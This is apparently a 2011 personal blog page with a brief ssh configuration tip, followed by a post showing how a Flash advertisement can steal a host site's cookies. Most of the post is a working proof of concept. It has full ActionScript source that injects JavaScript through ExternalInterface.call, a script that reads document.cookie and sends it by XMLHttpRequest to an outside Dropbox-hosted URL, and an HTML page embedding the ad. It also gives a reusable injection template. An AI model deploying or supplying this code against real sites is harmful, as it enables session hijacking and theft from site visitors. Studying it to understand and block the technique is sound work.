ssh root@somehost
... takes a long time before password prompt
So, in ~/.ssh/config:
GSSAPIAuthentication no
Thursday, March 31, 2011
Wednesday, March 16, 2011
how flash ads get your cookie
A Flash advertisement, hosted on http://ad.com/ad.swf, displayed on http://yoursite.com, can get cookie and send it to ad.com.
Example setup: http://pastehtml.com/view/1dntfa4.html
A swf is hosted on dl.dropbox.com. And it gets document.cookie of pastehtml.com and sends it to dl.dropbox.com.
The swf is using ExternalInterface.call() to execute arbitrary javascript.
This technique is explained here:
http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html
Code:
So, you can execute arbitrary javascript by passing a string to ExternalInterface.call():
"\\")); YOUR SCRIPT HERE }catch(e){}//""
And, you can do cross domain xhr using swf (only to the domain where swf is hosted at).
Example setup: http://pastehtml.com/view/1dntfa4.html
A swf is hosted on dl.dropbox.com. And it gets document.cookie of pastehtml.com and sends it to dl.dropbox.com.
The swf is using ExternalInterface.call() to execute arbitrary javascript.
This technique is explained here:
http://lcamtuf.blogspot.com/2011/03/other-reason-to-beware-of.html
Code:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package { | |
| import flash.display.Sprite; | |
| import flash.external.ExternalInterface; | |
| import flash.text.TextField; | |
| import flash.text.TextFieldType; | |
| import flash.text.TextFieldAutoSize; | |
| import flash.system.Security; | |
| //advertisement swf doing xhr to their domain | |
| [SWF(width="300",height="300")] | |
| public class ad extends Sprite { | |
| private const output:TextField = new TextField(); | |
| public function ad() { | |
| Security.allowDomain("*"); | |
| output.width = 300; | |
| output.height = 300; | |
| output.multiline = true; | |
| output.wordWrap = true; | |
| output.border = true; | |
| output.text = "ad\n"; | |
| addChild(output); | |
| //const script:String = '"\\"));console.debug(document.cookie);}catch(e){console.debug(e);}//""'; | |
| const script:String = '"\\"));var xhr=new XMLHttpRequest();xhr.open(\'GET\',\'http://dl.dropbox.com/u/17640032/flash-ad-cookie-steal/ad.as?\'+document.cookie,false);xhr.send();}catch(e){}//""'; | |
| if (ExternalInterface.available) { | |
| try { | |
| ExternalInterface.call("", script); | |
| } catch (error:SecurityError) { | |
| output.appendText("A SecurityError occurred: " + error.message + "\n" + error.errorID + "\n" + error.name + "\n"); | |
| } catch (error:Error) { | |
| output.appendText("An Error occurred: " + error.message + "\n"); | |
| } | |
| } else { | |
| output.appendText("External interface is not available for this container."); | |
| } | |
| } | |
| } | |
| } | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html lang="en"> | |
| <head> | |
| <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> | |
| <title>Advertisement</title> | |
| <script type="text/javascript"> | |
| var onReady = function() { | |
| document.cookie = "foo=bar"; | |
| }; | |
| </script> | |
| </head> | |
| <body onload="onReady();"> | |
| <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" | |
| id="ExternalInterfaceExample" width="300" height="300" | |
| codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"> | |
| <param name="movie" value="http://dl.dropbox.com/u/17640032/flash-ad-cookie-steal/ad.swf" /> | |
| <param name="quality" value="high" /> | |
| <param name="bgcolor" value="#869ca7" /> | |
| <param name="allowscriptaccess" value="always" /> | |
| <embed src="http://dl.dropbox.com/u/17640032/flash-ad-cookie-steal/ad.swf" quality="high" bgcolor="#869ca7" | |
| width="300" height="300" name="ExternalInterfaceExample" align="middle" | |
| play="true" loop="false" quality="high" allowscriptaccess="always" | |
| type="application/x-shockwave-flash" | |
| flashvars='allowscriptaccess=always' | |
| pluginspage="http://www.macromedia.com/go/getflashplayer"> | |
| </embed> | |
| </object> | |
| </body> | |
| </html> |
"\\")); YOUR SCRIPT HERE }catch(e){}//""
And, you can do cross domain xhr using swf (only to the domain where swf is hosted at).
Subscribe to:
Posts (Atom)